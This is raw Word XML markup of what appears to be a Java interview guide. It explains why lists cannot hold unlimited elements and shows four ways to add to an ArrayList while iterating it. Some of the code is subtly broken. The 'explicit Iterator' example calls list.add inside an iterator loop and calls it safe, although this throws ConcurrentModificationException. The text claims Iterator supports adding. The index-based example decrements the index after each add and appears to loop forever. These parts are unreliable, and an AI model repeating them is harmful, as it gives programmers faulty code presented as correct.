    <w:p w14:paraId="71FC8EFB" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85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you try to store more elements than your system can handle, you'll encounter an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01063410" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1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JVM and System Limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66080D79" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85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Java Virtual Machine (JVM) allocates a certain amount of heap memory for storing objects. Even though collections like ArrayList can dynamically resize, they are ultimately limited by the heap size set by the JVM or the physical memory available on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF9B59F" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85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maximum memory you can use for an application is limited by the JVM configuration and the system architecture (e.g., 32-bit vs. 64-bit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB971D2" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1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Practical Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850760F" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ven though structures like ArrayList and LinkedList can grow dynamically, adding more and more elements will eventually lead to performance degradation as the memory consumption increases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CDDF16" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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e case of a LinkedList, while it doesn’t need contiguous memory (unlike ArrayList), each element still requires memory for storing references (pointers), and you’ll run into limitations eventually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F42D54" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1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Java's Long.MAX_VALUE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BBD4A" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85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typical List in Java (like ArrayList) cannot have more than Integer.MAX_VALUE elements due to the internal implementation that uses an array for storage (and ArrayList is indexed by an int, which has a maximum value of Integer.MAX_VALUE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4919AE8D" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85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larger collections, you would need specialized data structures or approaches, and even then, you would run into the aforementioned memory limitations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A3BFF" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C34A1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0C8A8BD">
          <v:rect id="_x0000_i1574" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FECB19B" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1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2666467A" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">
      <w:pPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You cannot store infinite elements in a list because all systems and Java applications are constrained by physical memory and JVM settings. The maximum number of elements you can store depends on available memory and the limits of the data structure. If you need to store very large datasets, consider techniques like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>paging</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streaming</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databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that store data externally rather than in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A084880" w14:textId="1F94998D"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5C0C6BA">
          <v:rect id="_x0000_i1575" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B05101A" w14:textId="77777777" w:rsidR="000217FF" w:rsidRPr="00CE4B95" w:rsidRDefault="000217FF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="185" w:name="_Toc196307665"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can we add data while iterating ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w14:paraId="34E96646" w14:textId="02C5551F" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">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adding data to an ArrayList while iterating over it can be tricky, especially when using an iterator. This is because modifying the list (e.g., adding or removing elements) during iteration can result in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentModificationException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you're using a standard for-each loop or an iterator in certain cases. However, there are ways to safely add data while iterating over an ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79055C46"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 are a few approaches to safely add data while iterating through an ArrayList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB1E942" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD00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Using an Explicit Iterator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E5E53"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n Iterator allows you to safely modify the list (by adding or removing elements) during iteration, as long as you handle the add method properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1285455C"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC29E89"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import java.util.Iterator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E48A584" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54029830"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AddDataWhileIterating {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02953E1C"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327C7564"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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB0402A"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639A7CFF"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BA38A6"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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C155D" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6C818D"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se an iterator to safely add elements while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B2E639"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terator&lt;Integer&gt; iterator = list.iterator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A36F70B"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hile (iterator.hasNext()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B02EC6"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eger element = iterator.next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FF2A3D"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urrent element: " + element);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7604247F" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F92123"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You can add new elements while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B78FF13"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element == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE610D"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4);  // Adding new element to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3E382B"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6FD9A9E"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A2186CC" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733D336C"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Updated list: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEAA50F"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DCAD66F"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991640C" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD00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Using a ListIterator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B806CA"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ListIterator can be used if you want to add data while iterating, as it provides methods like add() and remove() that allow safe modification of the list while iterating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E93278"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5442238C"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stIterator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A98BD" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A24D33"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AddDataWhileIterating {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B785C64"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037D5162"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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A7C330"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F7F72F"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD28B88"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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3FC8DC" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C095B57"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se ListIterator to add data while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01F405"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Iterator&lt;Integer&gt; iterator = list.listIterator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB2E5F"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hile (iterator.hasNext()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2EC215"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eger element = iterator.next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D89C15"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urrent element: " + element);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8C698" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F177D73"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You can safely add new elements while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03348284"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element == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107FBE59"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terator.add(4);  // Adding new element while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB61F40"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8D9863B"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BFF772D" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028BC8DA"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Updated list: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A4FBF5"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F62B8A8"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952B690" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD00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Using an Index-Based for Loop (with caution):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65326842"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approach is generally not recommended because modifying the list can shift the elements, potentially causing issues with the iteration. If you choose to go this route, you need to be mindful of the index changes after adding new elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D6A3C9"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import java.util.ArrayList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5640DF" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A035F3C"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AddDataWhileIterating {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6971C9"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5E3F28EC"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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3811DE25"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20840750"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041941B0"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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F9A433" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1D1943"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se an index-based for loop to avoid ConcurrentModificationException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5EE5EC"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or (int i = 0; i &lt; list.size(); i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A76C9E"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eger element = list.get(i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FEDA17"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urrent element: " + element);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66018563" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6367096B"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dding new elements after certain conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E141A4"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element == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169FD60C"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4);  // Adding a new element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE336F3"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  // Decrementing the index to avoid skipping elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BFAF52"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BB58240"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D52CA8F" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C31ACC9"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Updated list: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE76E1"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DE38A1A"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D35E4BB" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD00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Using a Separate List for New Elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7794B93D"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nother approach is to collect the new elements in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while iterating, and then add them to the original list after the iteration is complete. This avoids modifying the list while iterating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F935B2A"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731D136D"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F2D24" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F39153"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AddDataWhileIterating {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651AEF6C"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555FED02"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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C143958"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE8DA16"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16032DCD"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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1300C09B" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE9B774"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Integer&gt; toAdd = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F9903" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480DC096"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Iterate through the list, collect new elements in a separate list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A212AF"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or (Integer element : list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB39566"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urrent element: " + element);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A772B05" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BA24CE"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element == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682298F9"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oAdd.add(4);  // Collect new element to be added later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125373C2"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68C9126"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9A93711" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB28654"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dd new elements after the iteration is complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD827CC"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All(toAdd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B8A83" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7D8F6B"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Updated list: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF3CED1"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65204AF" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0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38AA8D4" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD0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0FDEF7">
          <v:rect id="_x0000_i1576" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="297BC581" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD00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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C549C57" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Avoid Concurrent Modification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Directly modifying an ArrayList (i.e., adding or removing elements) while iterating with a for-each loop can cause a ConcurrentModificationException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE6B1B" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Iterator or ListIterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These allow safe modification of the list during iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5FB8CF" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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odify After Iteration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collect changes in a separate list and add them afterward if you don't want to modify the list while iterating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641BA69" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By following these approaches, you can safely add data to an ArrayList while iterating through it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E85459" w14:textId="057BC2BC"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809A7EB">
